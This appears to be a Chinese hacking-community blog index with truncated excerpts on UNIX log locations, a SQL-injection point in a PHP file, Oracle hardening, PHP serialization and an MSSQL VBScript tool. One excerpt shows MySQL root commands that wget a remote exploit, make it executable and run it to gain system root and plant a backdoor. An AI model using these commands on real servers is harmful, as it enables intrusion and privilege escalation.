author:樱花浪子

UNIX网管员主要是靠系统的LOG,来获得入侵的痕迹.当然也有第三方工具记录入侵系统的 痕迹,UNIX系统存放LOG文件,普通位置如下:
/usr/adm – 早期版本的UNIX
/var/adm – 新一点的版本使用这个位置
/var/log – 一些版本的Solaris,linux BSD,Free BSD使用这个位置
/etc – 多数UNIX版本把utmp放在这里，有些也把wtmp放在这里，syslog.conf在这里
下面的一些文件根据你所在的目录不同而不同：
acct 或 pacct — 记录每个用户使用的命令记录
access_log — 主要当服务器运行NCSA HTTPD时, 记录什么站点连接过你的服务器
aculog — 保存着你拨出去的MODEMS记录
lastlog — 记录了用户最近的LOGIN记录和每个用户的最初目的地，有时是最后不
成功LOGIN的记录,当一个用户登陆到unix系统，注册程式在lastlog文件中查找该用户的uid，如果该程式找到了
该用户的uid，unix就会显示最后一次登陆的时间和tty（终端号） 阅读全文

http://www.packetstormsecurity.org/papers/database/PT-devteev-FAST-blind-SQL-Injection.txt

by:T00ls 核心成员 Xhm1n9 2010.8.19

1,joinvipgroup.php  //注入
function up_vipuser(){
global $lang,$db,$dv,$userid,$userinfo,$vipgroupuser;
$groupid=$_POST['vipgroupid'];
$btype=$_POST['Btype'];
$vipmoney=$_POST['vipmoney'];
$vipticket=$_POST['vipticket'];
if($groupid==0 or $vipmoney<0 or $vipticket<0){echo “@@”;
showmsg($lang['join.info4']);
exit;
} 阅读全文

author:man8_msf

最近在牛蝇们的blog里看到了oracle 加固经验一文，结合自己的经验，补充一下。

1.删除或锁定账号

alter user username lock;

drop user username cascade;

2.更改密码

alter user username identified by “password”

3.限制数据库超级管理员远程登录

1. 在spfile中设置

REMOTE_LOGIN_PASSWORDFILE=NONE

2.在sqlnet.ora中设置

SQLNET.AUTHENTICATION_SERVICES=NONE 禁用SYSDBA角色的自动登录 阅读全文

author:Ra1nker

mysql5.x for linux下面有一个函数，可以帮助我们干很多事情，这个函数4。x下面貌似没，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4,x的 明天再看看函数手册，再装一个实验一下。

mysql 5.x里面引入了一个system函数，这个函数可以执行系统命令，当mysql以root登陆的时候，就可以利用这个函数执行命令，当然是在权限许可的 范围内。

一般我们按照常规思路，搞到mysql的root密码之后，我们都会连接上去，创建一个表，然后outfile，搞到一个webshell ,然后提权如此这般。今天我们换一种方式。

按照上面的方法，我们需要知道web的绝对路径，当然这个很不好找，有些有sqlinjection的，可能报错会显示出来，有的就不一定了。但是 按照我的的方法，没有必要再去找web路径了，直接执行

mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样就可以找到web的路径，当然，我们的目的并不是找web路径，放webshell进去。我们是要来做其他的事情，比如，下载exp执行， 搞到 root权限，然后装后门虾米的

mysql>system wget  http://www.ra1nker.com/xxxx ;

mysql>system chmod +x xxxx;

mysql>system ./xxxx;
这样mysql的root此时就成为system的root了，剩下的事情，如果开了ssh,就ssh上去，输入mysql的用户密码，ok,搞定。

#my5t3ry：网上转的，记录一下

serialize()和unserialize()在php手册上的解释是:

serialize — Generates a storable representation of a value

serialize — 产生一个可存储的值的表示

unserialize — Creates a PHP value from a stored representation

unserialize — 从已存储的表示中创建 PHP 的值

很显然,”a stored representation“的解释翻译成了一 个可存储的值后依然很让人非常费解它的意思。

如果语言已经无法表述清楚，那么我们可以以一个具体的PHP的例子来学习这两个函数的用途 阅读全文

转自：http://hi.baidu.com/ylbhz/blog

author:NP

set arg=wscript.arguments
If arg.count = 0 Then
show_help()
wsh.quit
End If
Server = arg(0)
User   = arg(1)
pass   = arg(2)
database_name = arg(3)
table_name = arg(4)
set Conn = CreateObject(“ADODB.Connection”)
Conn.Open “Driver={SQL Server};Server=” & Server & “;UID=” & User & “;PWD=” & Pass & “;Database=” & database_name
Set rs = conn.execute(“select count(*) as n from ” & database_name & “.dbo.sysobjects where id = object_id(N’[dbo].[" & table_name & "]‘)”) 阅读全文